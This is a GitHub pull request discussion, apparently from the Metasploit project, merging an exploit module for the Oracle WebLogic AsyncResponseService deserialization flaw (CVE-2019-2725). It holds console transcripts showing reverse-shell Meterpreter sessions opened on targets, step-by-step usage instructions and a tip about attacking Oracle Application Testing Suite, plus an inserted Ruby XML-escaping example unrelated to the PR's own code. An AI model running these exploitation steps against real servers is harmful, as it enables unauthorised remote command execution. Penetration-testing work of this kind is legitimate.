Add Weblogic deserialize AsyncResponseService module #11780

Merged

@acamro
Contributor

commented Apr 26, 2019

Hello again,
I've been very busy lately, however, here you have another juicy contribution.
By the way, thank you so much for the acknowledgment in the articles (y)...

Please, add this exploit module for CVE-2019-2725, CNVD-C 2019-48814, Oracle Weblogic Deserialization Vulnerability in the WLS AsyncResponseService web service component.
It was tested on Windows 7 x64 and Ubuntu 14.04.4 x64 with Oracle Weblogic Server v10.3.6 and v12.1.3.

More Info:
[1] https://medium.com/@knownseczoomeye/knownsec-404-team-oracle-weblogic-deserialization-rce-vulnerability-0day-alert-90dd9a79ae93
[2] https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
[3] https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

Please feel free to fix or add things!!!

TODO

Fix the Unix payload to make it more generic
Add more payloads
More tests on Linux
Tests on Solaris
Documentation

DEMO

 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set uripath http://192.168.192.132
 uripath => http://192.168.192.132
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set wspath /_async/AsyncResponseService
 wspath => /_async/AsyncResponseService
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lport 8888
 lport => 8888
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.192.129
 lhost => 192.168.192.129
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > exploit
 [*] Started reverse TCP handler on 192.168.192.129:8888
 [*] Generating payload...
 [*] [/_async/AsyncResponseService] Sending payload...
 [*] Sending stage (179779 bytes) to 192.168.192.132
 [*] Meterpreter session 2 opened (192.168.192.129:8888 -> 192.168.192.132:53854) at 2019-04-25 16:49:49 -0700

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows

Verification

  • Start msfconsole
  • use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
  • set uripath
  • set wspath
  • set rport
  • set lhost
  • set lport
  • exploit
  • sessions -i 1
  • Enjoy!!!

acamro added some commits Apr 26, 2019

Forgotten string interpolation..
Co-Authored-By: acamro <acamro@users.noreply.github.com>
@wvu-r7
Contributor

left a comment

A few things to update or change. Thanks for the submission!

acamro added some commits May 1, 2019

@wvu-r7

wvu-r7 approved these changes May 1, 2019

asoto-r7 added some commits May 6, 2019

weblogic_deserialize_asyncresponseservice: Added check method, improved exception handling, minimizing XML strings
@asoto-r7

Contributor

commented May 6, 2019

@acamro : Thanks again for the quick turnaround!

I compared your xml_encode method to your newer commit's shell_payload.encode(xml: :text) technique. There are definitely differences; the latter seems more efficient and just as reliable, so good change!

I went ahead and wrote docs, added a check method (from which I'd love feedback), and addressed some of @wvu-r7's stylistic comments. I also strengthened some exception handling based on my testing to deal with failed exploit attempts. Lastly, I removed some whitespace in the XML strings for maximum speed! 😃

I've tested this against Ubuntu and Win10 on WebLogic v10.3.6, as well as against a seemingly non-vulnerable WebLogic 12c (12.2.1.2). Throwing this against the latter doesn't seem to cause any adverse effects.

Getting ready to land this PR. 👍
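
As an added example (not code from the PR or from Metasploit), the following Ruby compares a hand-rolled XML text escaper, a hypothetical stand-in for the PR's original xml_encode method whose body is not shown on this page, with the String#encode(xml: :text) call the later commit switched to. It also shows the attribute-context variant and the hex character references Ruby emits for characters the target encoding cannot represent.

```ruby
# Constructed example: escaping arbitrary text for safe embedding in an XML
# document, comparing a manual escaper with Ruby's built-in encoder.

# Hypothetical hand-rolled escaper (assumption: a helper of this shape is what
# a custom xml_encode method would implement; it is not the PR's code).
XML_TEXT_ESCAPES = { '&' => '&amp;', '<' => '&lt;', '>' => '&gt;' }.freeze

def xml_encode_manual(str)
  # A single gsub pass with a hash avoids double-escaping '&' in entities
  # produced by an earlier replacement.
  str.gsub(/[&<>]/, XML_TEXT_ESCAPES)
end

# Built-in equivalent for text nodes: escapes '&', '<' and '>'.
def xml_encode_builtin(str)
  str.encode(xml: :text)
end

# Attribute context: also escapes '"' and wraps the value in double quotes.
def xml_attr_builtin(str)
  str.encode(xml: :attr)
end

# When the destination encoding lacks a character, Ruby substitutes a
# hexadecimal character reference instead of raising Encoding::UndefinedConversionError.
def xml_encode_ascii(str)
  str.encode('US-ASCII', xml: :text)
end

# Returns true when both escapers produce identical output for every sample.
def escapers_agree?(samples)
  samples.all? { |s| xml_encode_manual(s) == xml_encode_builtin(s) }
end

# Constructed sample inputs covering the characters XML treats specially.
SAMPLES = [
  'echo "a" > out.txt',
  '<tag attr="1">&amp;</tag>',
  "sh -c 'echo 1 & echo 2'",
  'plain text'
].freeze

if $PROGRAM_NAME == __FILE__
  SAMPLES.each { |s| puts "#{s.inspect} -> #{xml_encode_builtin(s).inspect}" }
  puts "manual and built-in agree: #{escapers_agree?(SAMPLES)}"
end
```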

@asoto-r7

Contributor

commented May 6, 2019

Sanity testing failed because of a VM / infrastructure failure, not because of anything in the module:

testlog:[2019-05-06 20:27:24.574657] PROCESSING: Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.574761] DID NOT FIND VM: Sanity_Win2016x64 ON 10.17.4.6
testlog:[2019-05-06 20:27:24.574833] RESETTING VM Sanity_APT_MSF_HOST
testlog:[2019-05-06 20:27:24.574893] NO TEMP SNAPSHOT FOUND FOR Sanity_APT_MSF_HOST
testlog:[2019-05-06 20:27:24.574958] RESETTING VM Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.575014] NO TEMP SNAPSHOT FOUND FOR Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.575067] THERE WAS A PROBLEM RESETTING VMS
testlog:[2019-05-06 20:27:24.575120] WAITING FOR ALL TASKS TO COMPLETE
testlog:[2019-05-06 20:27:29.580310] TEST FAILED

@asoto-r7 asoto-r7 merged commit aed8781 into rapid7:master May 6, 2019

1 of 3 checks passed

Metasploit Automation - Sanity Test Execution Failed to pass tests.
continuous-integration/travis-ci/pr The Travis CI build is in progress
Metasploit Automation - Test Execution Successfully completed all tests.
@asoto-r7

Contributor

commented May 6, 2019

Release Notes

exploit/multi/misc/weblogic_deserialize_asyncresponseservice exploits an XML deserialization vulnerability (CVE-2019-2725 aka CNVD-C 2019-48814) in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.

@wvu-r7

Contributor

commented May 7, 2019

Great work!!

@ccondon-r7

Contributor

commented May 7, 2019

Agreed :) Thanks, all.

@wchen-r7

Contributor

commented May 19, 2019

I was working on a bug for Oracle Application Testing Suite and I noticed this also works against its WebLogic service, except this is on port 8088 by default. Just wanted to share for whoever is attacking Oracle services:

msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Generating payload...
[*] Powershell command length: 2309
[*] Sending payload...
[*] Sending stage (179779 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49211) at 2019-05-19 00:30:29 -0500

meterpreter > 
@wvu-r7

Contributor

commented May 19, 2019

Don't forget to sleep!
